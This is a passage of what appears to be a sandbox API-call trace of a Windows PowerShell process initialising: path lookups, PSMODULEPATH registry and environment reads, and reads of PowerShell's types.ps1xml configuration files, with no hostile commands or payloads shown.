	[0142.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.331] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.331] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0142.331] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.332] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d31d0
	[0142.332] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d31d0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0142.332] CoTaskMemFree (pv=0x1b7d31d0) 
	[0142.332] CoTaskMemAlloc (cb=0xf0) returned 0x1b7cba50
	[0142.332] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7cba50, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0142.332] CoTaskMemFree (pv=0x1b7cba50) 
	[0142.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd488 | out: phkResult=0x1cd488*=0x344) returned 0x0
	[0142.333] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd40c, lpData=0x0, lpcbData=0x1cd408*=0x0 | out: lpType=0x1cd40c*=0x2, lpData=0x0, lpcbData=0x1cd408*=0x6c) returned 0x0
	[0142.333] CoTaskMemAlloc (cb=0x70) returned 0x380e20
	[0142.333] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd3dc, lpData=0x380e20, lpcbData=0x1cd3d8*=0x6c | out: lpType=0x1cd3dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd3d8*=0x6c) returned 0x0
	[0142.333] CoTaskMemFree (pv=0x380e20) 
	[0142.333] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d31d0
	[0142.333] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7d31d0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0142.333] CoTaskMemFree (pv=0x1b7d31d0) 
	[0142.333] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d31d0
	[0142.333] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d31d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0142.333] CoTaskMemFree (pv=0x1b7d31d0) 
	[0142.540] RegCloseKey (hKey=0x344) returned 0x0
	[0142.540] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d31d0
	[0142.540] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d31d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0142.540] CoTaskMemFree (pv=0x1b7d31d0) 
	[0142.540] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd488 | out: phkResult=0x1cd488*=0x344) returned 0x0
	[0142.540] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd40c, lpData=0x0, lpcbData=0x1cd408*=0x0 | out: lpType=0x1cd40c*=0x0, lpData=0x0, lpcbData=0x1cd408*=0x0) returned 0x2
	[0142.540] RegCloseKey (hKey=0x344) returned 0x0
	[0142.551] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.551] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.555] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.555] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.661] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.661] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.661] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.661] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.664] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd278 | out: phkResult=0x1cd278*=0x344) returned 0x0
	[0142.666] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x1cd28c, lpData=0x0, lpcbData=0x1cd288*=0x0 | out: lpType=0x1cd28c*=0x1, lpData=0x0, lpcbData=0x1cd288*=0x74) returned 0x0
	[0142.667] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x0, lpcbData=0x1cd1f8*=0x0 | out: lpType=0x1cd1fc*=0x1, lpData=0x0, lpcbData=0x1cd1f8*=0x74) returned 0x0
	[0142.667] CoTaskMemAlloc (cb=0x78) returned 0x380e20
	[0142.667] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x380e20, lpcbData=0x1cd1c8*=0x74 | out: lpType=0x1cd1cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd1c8*=0x74) returned 0x0
	[0142.668] CoTaskMemFree (pv=0x380e20) 
	[0142.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0142.668] SetErrorMode (uMode=0x1) returned 0x1
	[0142.668] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd150 | out: lpFileInformation=0x1cd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0142.668] SetErrorMode (uMode=0x1) returned 0x1
	[0142.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0142.671] SetErrorMode (uMode=0x1) returned 0x1
	[0142.671] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd150 | out: lpFileInformation=0x1cd150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0142.671] SetErrorMode (uMode=0x1) returned 0x1
	[0142.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0142.675] SetErrorMode (uMode=0x1) returned 0x1
	[0142.675] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd150 | out: lpFileInformation=0x1cd150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0142.675] SetErrorMode (uMode=0x1) returned 0x1
	[0142.810] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.810] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.819] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0142.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.819] CoTaskMemFree (pv=0x1b7da8b0) 
	[0142.820] GetACP () returned 0x4e4
	[0142.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0142.841] SetErrorMode (uMode=0x1) returned 0x1
	[0142.842] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0142.843] GetFileType (hFile=0x34c) returned 0x1
	[0142.843] SetErrorMode (uMode=0x1) returned 0x1
	[0142.843] GetFileType (hFile=0x34c) returned 0x1
	[0142.847] ReadFile (in: hFile=0x34c, lpBuffer=0x2e81178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e81178*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0142.945] ReadFile (in: hFile=0x34c, lpBuffer=0x2e81178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e81178*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0142.945] ReadFile (in: hFile=0x34c, lpBuffer=0x2e81178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e81178*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0142.946] ReadFile (in: hFile=0x34c, lpBuffer=0x2e81178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e81178*, lpNumberOfBytesRead=0x1cd088*=0xcf3, lpOverlapped=0x0) returned 1
	[0142.946] ReadFile (in: hFile=0x34c, lpBuffer=0x2e805d3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e805d3*, lpNumberOfBytesRead=0x1cd088*=0x0, lpOverlapped=0x0) returned 1
	[0142.946] ReadFile (in: hFile=0x34c, lpBuffer=0x2e81178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2e81178*, lpNumberOfBytesRead=0x1cd088*=0x0, lpOverlapped=0x0) returned 1
	[0142.948] CloseHandle (hObject=0x34c) returned 1
	[0142.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0142.952] SetErrorMode (uMode=0x1) returned 0x1
	[0142.952] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd000 | out: lpFileInformation=0x1cd000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0142.952] SetErrorMode (uMode=0x1) returned 0x1
	[0142.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0142.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x34c) returned 0x0
	[0142.953] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd06c, lpData=0x0, lpcbData=0x1cd068*=0x0 | out: lpType=0x1cd06c*=0x1, lpData=0x0, lpcbData=0x1cd068*=0x56) returned 0x0
	[0142.953] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0e40
	[0142.953] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd03c, lpData=0x1b7c0e40, lpcbData=0x1cd038*=0x56 | out: lpType=0x1cd03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd038*=0x56) returned 0x0
	[0142.953] CoTaskMemFree (pv=0x1b7c0e40) 
	[0142.953] RegCloseKey (hKey=0x34c) returned 0x0
	[0142.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0142.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0143.092] GetSystemInfo (in: lpSystemInfo=0x1cbd20 | out: lpSystemInfo=0x1cbd20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0143.092] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0143.229] SetErrorMode (uMode=0x1) returned 0x1
	[0143.229] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0143.229] GetFileType (hFile=0x34c) returned 0x1
	[0143.229] SetErrorMode (uMode=0x1) returned 0x1
	[0143.229] GetFileType (hFile=0x34c) returned 0x1
	[0143.229] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.230] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.230] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.230] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.231] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.231] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.231] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.231] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.231] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.232] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.233] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.233] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.233] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.233] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
	[0143.236] ReadFile (in: hFile=0x34c, lpBuffer=0x2d84a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd088, lpOverlapped=0x0 | out: lpBuffer=0x2d84a78*, lpNumberOfBytesRead=0x1cd088*=0x1000, lpOverlapped=0x0) returned 1
